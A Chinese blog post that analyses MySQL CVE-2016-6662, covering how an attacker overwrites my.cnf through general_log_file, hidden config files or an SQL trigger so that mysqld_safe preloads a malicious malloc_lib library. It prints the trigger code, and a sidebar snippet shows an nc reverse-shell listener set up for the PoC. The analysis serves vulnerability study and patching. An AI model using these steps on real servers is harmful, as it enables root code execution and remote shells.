mysql my malloc_【技术分享】CVE-2016-6662-MySQL ‘malloc_lib’变量重写命令执行分析

最新推荐文章于 2023-02-24 21:02:37 发布
最新推荐文章于 2023-02-24 21:02:37 发布
阅读量281 收藏
点赞数
文章标签: mysql my malloc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36185435/article/details/113229207
版权
本文详细分析了MySQL中的CVE-2016-6662漏洞,该漏洞允许攻击者通过控制'malloc_lib'变量实现远程代码执行或权限提升。通过设置全局变量、利用隐藏配置文件或触发器文件,攻击者可以篡改my.cnf,控制mysqld_safe进程。修复措施包括限制malloc_lib的路径,但文章指出MySQL对此处理不当,缺乏与发行版的沟通。
摘要由CSDN通过智能技术生成

84554

引用

【漏洞预警】Mysql代码执行漏洞,可本地提权(含exp,9/13 01点更新)

【技术分享】CVE-2016-6662:Mysql远程代码执行/权限提升技术分析正式版(9/13 10:47更新)

前言

今天有个关于MySQL的漏洞被披露出来,编号CVE-2016-6662。该漏洞主要涉及到 mysqld_safe 脚本中在加速/处理内存时会采用 “malloc_lib”变量作为辨别标记选择性加载(preload方式)比如tcmalloc之类的malloc库。不幸的的是这个变量可以被my.cnf所控制,导致my.cnf一旦被攻击者在mysql客户端篡改的话可以直接导致mysqld_safe所调用的mysqld进程执行权被控制。

技术分析

具体的攻击思路前言部分基本已经表述出来,这里不再重述。笔者来看看漏洞作者在【1】中做了3种攻击方式。作者的思路基本是围绕着如何用这几种技巧写入 my.cnf 被mysqld_safe调用执行这个中心攻防点来进行。

我们先看看最简单的第1种方法

1)采用 set global general_log 来绕过已存在文件(即my.cnf)

a)设置 my.cnf 为 mysql 用户所在权限的基础上

# ll /etc/my.cnf

-rw-r–r– 1 mysql mysql 380 Sep 12 23:18 /etc/my.cnf

注:默认权限是root,但是不排除mysql集群使用时每个my.cnf是mysql组可读写;

b)开始攻击,各位直接看图吧

注: 这里使用root登录,普通用户默认是没更改全局变量general_log_file 的权限

mysql>  set global general_log_file = '/etc/my.cnf';

ERROR 1227 (42000): Access denied; you need the SUPER privilege for this operation

84554

攻击成功后的my.cnf

84554

2)使用隐藏的/var/lib/mysql/.my.cnf 和 /var/lib/mysql/my.cnf

这部分讲起来其实意义不大,就是历史原因造成这部分mysql数据目录下的my.cnf和.my.cnf。最糟糕的是这部分还是mysql用户组可以读写的目录。所以我们又能控制到my.cnf了。

写入的方法有两种,一种还是方法一的变量,另一个是常见 INTO OUTFILE 文件注入技巧。

3)作者考虑下了上面2种方式都是需要root/admin 组的权限,那换个带文件操作权限的普通用户呢?

作者在假设攻击者还有文件权限的情况下使用写入触发器文件的方式来“提权”(注意是提权)执行这个触发器。

CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf

AFTER INSERT

ON `active_table` FOR EACH ROW

BEGIN

DECLARE void varchar(550);

set global general_log_file='/var/lib/mysql/my.cnf';

set global general_log = on;

select "

[mysqld]

malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'

" INTO void;

set global general_log = off;

END;

接下来就等这个这个触发器在表被flushed的时候被触发了(说真的,笔者没实践这个步骤),比如:

INSERT INTO `active_table` VALUES('xyz');

这样我们就可以提权回到了步骤一。

最后,关于PoC或相关的信息您可以直接访问【1】获得。作者其实在后面的so也提供一个很好的回写技巧,由于preload可以优先mysqld进程加载my.cnf,所以它就能修复my.cnf里的内容。

总结

这个漏洞的危害建立在一个你至少需要普通用户的基础上,危害程度得因人而异,不注意安全的可能使用的mysql是一大堆弱口令的root用户;注意安全的基本都是普通mysql用户;集群上启动MySQL进程的用户也是个需要考虑的;至于web注入点使用这个功能个人觉得可能就比较窄了。

MySQL的修复【2】选择的是对malloc_lib的路径进行限制 /usr/lib, /usr/lib64, /usr/lib/i386-linux-gnu, or /usr/lib/x86_64-linux-gnu;

最后,笔者认为MySQL对于这样一个漏洞的处理是一个不太负责任的处理,也没见进入“禁运期”和各大发行版进行沟通。这点是需要官方进行考虑和改进的。

参考

引用

【漏洞预警】Mysql代码执行漏洞,可本地提权(含exp,9/13 01点更新)

【技术分享】CVE-2016-6662:Mysql远程代码执行/权限提升技术分析正式版(9/13 10:47更新)

蔡惘然
关注
CVE-2022-0847(脏管道、提权内核漏洞)
墨痕诉清风的博客
06-22 4264
摘要 CVE-2022-0847它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。它类似于 Dirty COW (CVE-2016-5195),但更容易被利用。内核影响版本:5.8 ...............
Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662
9ian1i
10-17 4804
0x00 漏洞影响mysql 5.5、5.6、5.7 在10月份更新前的所有版本,包括分支版本MariaDB和PerconaDB 。0x01 利用途径通过远程数据库连接,web接口如phpMyAdmin,以及sql注入都可以完成。0x02 漏洞原理一些默认的mysql安装方式并且mysqld_safe脚本作为包装器以root权限启动mysql服务进程,比如像:service mysql start
mysql malloc lib_CVE-2016-6662-MySQLmalloc_lib变量重写命令执行分析 | CN-SEC 中文网...
weixin_39760967的博客
01-19 234
摘要今天有个关于MySQL的漏洞被披露出来,编号CVE-2016-6662。该漏洞主要涉及到 mysqld_safe 脚本中在加速/处理内存时会采用 “malloc_lib变量作为辨别标记选择性加载(preload方式)比如tcmalloc之类的malloc库。不幸的的是这个变量可以被my.cnf所控制,导致my.cnf一旦被攻击者在mysql客户端篡改的话可以直接导致mysqld_safe所调...
mysql malloc lib_mysql启动过程
weixin_35508482的博客
01-19 919
明白/etc/init.d/mysql从哪里来,和mysql.server什么关系?/etc/init.d/mysqlmysqld_safe之间的关系mysqld_safe怎么把mysql启动起来的mysql就是mysql.server拷贝到这里来的。mysql启动,调用mysqld_safemysqld_safe调用mysqld将mysql启动起来。扩展知识:mysqld_safe是mysql...
mysql malloc lib_利用tamalloc 优化nginx和mysql
weixin_30209121的博客
01-27 176
TCMalloc的实现原理和测试报告请见一篇文章:《TCMalloc:线程缓存的Malloc》为MySQL添加TCMalloc库的安装步骤(Linux环境):1、64位操作系统请先安装libunwind库,32位操作系统不要安装。libunwind库为基于64位CPU和操作系统的程序提供了基本的堆栈辗转开解功能,其中包括用于输出堆栈跟踪的API、用于以编程方式辗转开解堆栈的API以及支持C++异常...
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4352
  在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
Glibc:浅谈 malloc_consolidate() 函数具体实现
热门推荐
加号减减号的博客
02-22 1万+
简介 源代码 分析 0x00 - 堆未初始化则初始化 0x01 - 堆已初始化则清空 fastbin 总结 简介 malloc_consolidate() 函数是定义在 malloc.c 中的一个函数,用于将 fastbin 中的空闲 chunk 合并整理到 unsorted_bin 中以及进行初始化堆的工作,在 malloc() 以及 free() 中均有可能调用 m...
CVE-2021-3156 漏洞复现笔记
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
mysql my malloc_Mysql源码学习:内存管理模块MEM_ROOT
weixin_39924481的博客
01-19 243
MEM_ROOT为mysql的内存管理模块,用于统一申请和释放内存,减少在堆中的内存申请操作的次数,以提升性能。基础结构申请的内存空间使用的结构体typedef struct st_used_mem{struct st_used_mem *next; /*连接指针,连接当前链表下所有的结构体unsigned int left; /*当前结构体中剩余的空间unsigned int size; /*结...
CVE-2016-6662,研究人员披露 关键MySQL 0day漏洞
nani1114的博客
09-14 2306
安全研究员Dawid Golunski揭露了一个影响流行的数据库管理系统(RDBMS)MySQL的关键性0day。研究人员决定披露关键漏洞,因为甲Oracle在研究人员报告0day漏洞40天后也没有没有发行补丁。 CVE-2016-6662可以被远程攻击者注入恶意设置为my.cnf配置文件。该漏洞可以被触发并完全向DBMS妥协,通过执行任意拥有root权限的代码,并在服务
【2.24】malloc()分配内存、MySQL事务、项目、动态规划
weixin_62633072的博客
02-24 667
在 Linux 操作系统中,虚拟地址空间的内部又被分为两部分,不同位数的系统,地址空间的范围也不同。比如最常见的 32 位和 64 位系统,如下所示:内核空间与用户空间的区别:进程在用户态时,只能访问用户空间内存;只有进入内核态后,才可以访问内核空间的内存;虽然每个进程都各自有独立的虚拟内存,但是。这样,进程切换到内核态后,就可以很方便地访问内核空间内存。用户空间内存从分别是 6 种不同的内存段:代码段,包括二进制可执行代码;数据段,包括已初始化的静态常量和全局变量
CVE-2016-6662 mysql RCE测试
weixin_30472035的博客
09-14 207
参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法 1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口: #define ATTACKERS_IP "xx.x.x.x" #define SHELL_PORT 81 在攻击者机器上做好端口监听,等待反弹: nc -lvv -p 81 ...
mysql my malloc_mysql层的内存分配
weixin_42348021的博客
01-19 364
mysql内存池mysql内部使用的内存管理程序,可以实现多次申请内存块, 中途任何时刻失败, 或者下次使用前释放内存, 无需再关心每次申请和释放了哪些内存.工作原理:初始化定义每次分配的最小内存块大小M,如果申请一次内存, 大小为X, X大于M, 就分配一块X的内存, 加入到管理链表中.如果小于的话, 看之前剩余的还够不够, 如果足够的话, 返回之前多余的内存地址.如果不够,则申请这么大的内存,...
mysql cve_CVE-2016-6662 mysql RCE测试
weixin_34409895的博客
01-30 333
参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:#define ATTACKERS_IP "xx.x.x.x"#define SHELL_PORT 81在攻击者机器上做好端口监听,等待反弹:nc -lvv -p 812.编译库gcc -Wall -fPI...
MySQL使用TCMalloc
KIN ORACLE
12-06 1465
TCMalloc的全称为Thread-Caching Malloc,是谷歌开发的开源工具“google-perftools”中的一个成员。与标准的glibc库的malloc相比,TCMalloc库在内存分配效率和速度上要高很多,这在很大程度上提高了服务器在高并发情况下的性能,从而降低系统负载。 要安装TCMalloc库,需要安装libunwind(32位操作系统不需要安装)和google-per
堆漏洞挖掘:19---_lib_malloc函数源码详解
董哥的黑板报
08-10 1292
一、_lib_malloc函数介绍 当我们在应用层调用malloc申请堆的时候,在glibc中实际上调用的是_lib_malloc函数,但是_lib_malloc函数只是用来简单的封装_int_malloc函数的,_int_malloc函数才是申请堆的核心函数 二、__malloc_hook全局变量 函数介绍:_lib_malloc首先通过__malloc_hook全局变量获取一个函数指针,然...
CVE-2016-6662 利用条件
weixin_30379973的博客
09-18 287
首先执行SET GLOBAL 需要超级用户权限,所以利用条件要么用户本身是超级用户要么用户有trigger权限,通过创建trigger,由超级用户触发SET GLOBAL。 然而MYsql有个通过file权限提权的漏洞一直没修,可通过写TRG文件创建Trigger方法,参考https://www.exploit-db.com/exploits/23077/,http://www.cnblogs....
MySQL远程代码执行(CVE-2016-6662)漏洞预警
煜铭2011
09-13 5972
一、漏洞基本信息 CVE编号:CVE-2016-6662 漏洞名称:MySQL远程代码执行 漏洞发布日期:2016.09.12 受影响的软件及系统:MySQL 漏洞概述:这个漏洞影响(5.7, 5.6, 和 5.5版本)的所有Mysql默认配置,包括最新的版本,攻击者可以远程和本地利用该漏洞。该漏洞需要认证访问MYSQL数据库(通过网络连接或者像phpMyAdmin的web接口),以及
rtc->avc_sps = av_malloc(rtc->avc_sps_size); gstreamer怎么替换
最新发布
06-01
在 GStreamer 中,可以使用 g_malloc() 函数替换 av_malloc() 函数。g_malloc() 函数是 GStreamer 中的内存分配函数,功能与 av_malloc() 函数类似,都可用于在内存中分配一块指定大小的空间。 下面是一个使用 g_malloc() 函数的示例代码: ```c #include <gst/gst.h> // 分配内存 guint8 *avc_sps = g_malloc(rtc->avc_sps_size); // 使用内存 // ... // 释放内存 g_free(avc_sps); ``` 需要注意的是,g_malloc() 函数与 av_malloc() 函数的用途相同,都是用于分配内存。但是,这两个函数所处的库不同,因此在使用时需要注意库的引入和命名空间的使用。 另外,需要注意的是,GStreamer 中还提供了一些其他的内存管理函数,如 g_realloc()、g_memdup() 等。如果需要在 GStreamer 中进行内存管理,建议先了解这些函数的使用方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值